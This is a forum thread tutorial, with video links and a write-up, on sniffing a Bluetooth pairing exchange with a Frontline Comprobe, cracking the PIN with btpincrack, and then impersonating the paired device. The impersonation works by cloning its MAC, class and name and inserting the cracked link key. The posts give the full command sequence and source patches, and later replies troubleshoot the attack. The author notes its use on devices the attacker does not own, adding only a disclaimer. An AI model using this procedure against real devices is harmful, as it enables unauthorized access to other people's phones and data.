Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: Video Tutorial: Using frontline comprobe to crack a link key exchange.

  1. #1
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Video Tutorial: Using frontline comprobe to crack a link key exchange.

    Hey guys

    Been messing around with a few things and decided to make this little tutorial in the process.

    Enjoy ;D

    Blip.tv link

    http://blip.tv/file/952892/

    Youtube link

    http://www.youtube.com/watch?v=r8QLAnmZZ2E

  2. #2
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Nice one doc ...maybe a write up would be good too
    dd if=/dev/swc666 of=/dev/wyze

  3. #3
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Ok here's the write up on my video

    Ok to setup this attack you will need the following...

    one or two bluetooth enabled devices
    frontline comprobe
    A regular bluetooth device (for getting macs)
    a copy of frontline.c
    openciphers btpincrack Click to download

    First thing is to setup your lab. Lets get the bluetooth hardware and services started.

    Code:
    hciconfig hci0 up 
    hciconfig hci1 up
    bash /etc/rc.d/rc.bluetooth start
    You an check everything is running correctly by issuing the hciconfig command.

    Code:
    hciconfig
    Ok now we are ready to setup frontline.c.

    Now I have had some trouble with the frontline source code and my frontline comprobe. I am using the airsniffer47-bc04 and it seems the packet shift is double than set in frontline.c ???

    I'm keen to find out whats going on and have asked the powers that be to look into this and they have asked me to try a couple of things. One suggestion is to change FP_TYPE_SHIFT to 2 but it still has the same results. For now you will have to check it out for yourself, but if possible please could somebody try frontline.c with a dlink dbt120 without my mod and post the log ?

    OK open frontline.c in your fav editor and find the following ...

    Code:
    #define TYPE_DV		8
    
    #define LMP_IN_RAND	8
    #define LMP_COMB_KEY	9
    #define LMP_AU_RAND	11
    #define LMP_SRES	12
    Now change to the following values ...

    Code:
    #define TYPE_DV		16  
    
    #define LMP_IN_RAND	16
    #define LMP_COMB_KEY	18
    #define LMP_AU_RAND	22
    #define LMP_SRES	24
    Save and exit, then compile with the following command..

    Code:
    gcc -lbluetooth frontline.c -o frontline
    Thats frontline.c patched, now we can start the sniffer

    ok if you run frontline with the -h tag you will see what options you have to play with. As explained in the video to start the sniffing process you will need the master's and slave's macs first. At the moment there is no way of telling who is the master or slave a piconet, obviously you would know this info because this is your equipment we are using right ??? ! lol But in a real situation it would just be trial and error and maybe a bit of a educated guess.

    Ok lets scan for devices, if you already know the macs skip this step

    Code:
    hcitool inq
    Good practice to always issue a stop to your sniffer before starting just in case.

    Code:
    frontline -d hci1 -s
    Next we tell the comprobe to filter all frames.

    Code:
    frontline -d hci1 -f 7
    Next we add our MAC's

    Code:
    frontline -d hci1 -S MA:ST:ER:MA:C1@SL:AV:EM:AC:01
    Now lets start the sniffing process. -p tell's frontline to look for a key exchange and -z tell frontline to ignore zero length packets or in my language crap

    Code:
    frontline -d hci1 -p -z -e
    Now pair the two devices and you should see some data. Once the pairing process is complete, stop frontline and check back for the pairing process as seen in the video.

    Next compile btpincrack I cant remember if you need to do anything to install onto bt3 so if you get errors post em and i'l fix em for you lol

    And run frontlines output through btpincrack as seen in the video. A 6 digit pin should take around 7 seconds .

    And you done

  4. #4
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Nice tutorial Doc, Im still awaiting enough money to invest in a RAM bluetooth device with sma connection. You seriously love your bluetooth hacking, its really interesting. Cant wait until the day that I have the correct bluetooth adapter.

    Out of interest, what adapters are you using? What firmware are you using for them?

    Again, great tutorial. I like reading your work, gotta love that 'one to rule them all thread' ...

    ... EDIT: Wow, fast reply. I had this window opened whilst watching your vid. Looks like you already included the information I was talking about.

  5. #5
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    You're a good man Doc...
    dd if=/dev/swc666 of=/dev/wyze

  6. #6
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Thanks guys, I'm using a fujitsu-siemens bluetooth v2.0

    EDIT:

    If you would like to then use the link key to connect to the device, first you would clone the MAC of the desired device. Then you need to change your device class and name to the same as the desired device. Next you need to add your link key to bt. Go to /var/lib/bluetooth/LO:CA:LM:AC:AD [i](replace with your devices MAC) and open linkkeys and add the following.

    Code:
    CL:ON:ED:MA:C linkkeydatalinkkaydatalinkkeydatalinkkeydata 0* 6*
    *1 First channel available
    *2 Last channel available

    Save and you are good to go This stuff is very naughty so please DO NOT USE ILLEGALLY !!!!!!!!!!!!!!!!!!!!!!!!!!!!!! I've sorta left bits out on purpose lol I will be adding all this stuff to Blue|Smash over the next day or two. After spoofing the link key anything is possible providing the spoofed device has clearance ;D

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    Now i receive this error when trying to connect:

    Cannot open '/dev/rfcomm0': No route to host

    I'm assuming this is due to cloning everything and the phone is getting mixed up do to previous connection and i cant delete the bluetooth entry unless I restore to default setting which is not something i want to do and im also guessing this is the part you left?

  8. #8
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    akamagic, explain more ????

  9. #9
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    Default

    Ok let me go back a bit. First of all I'm having problems having frontline capture anything other than the unknown type:1 and type:4 caused by starting the devices. I followed everything in the writeup including patching frontline and also without. In the video you use hci dump, which clearly shows the process of my connection. So either frontline is my problem or its my dongle. I have a DBT-120 C1 running up raw and so almost positive it is in fact a sniffer

    hci1: Type: USB
    BD Address: 00:1C:F0:EE:AAF ACL MTU: 0:0 SCO MTU: 0:0
    Sniff 47 (2006-02-15)
    Chip version: BlueCore4-External
    Max key size: 128 bit
    SCO mapping: HCI

    any suggestions would be appreciated

  10. #10
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Hey akamagic

    What are you trying to sniff ? I've also had problems like this when two devices change roles. Also distance is a big issue to, I would recommend you sniff only a foot away from the master.

    If you still get stuck post what you are trying to achieve including the equipment used.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •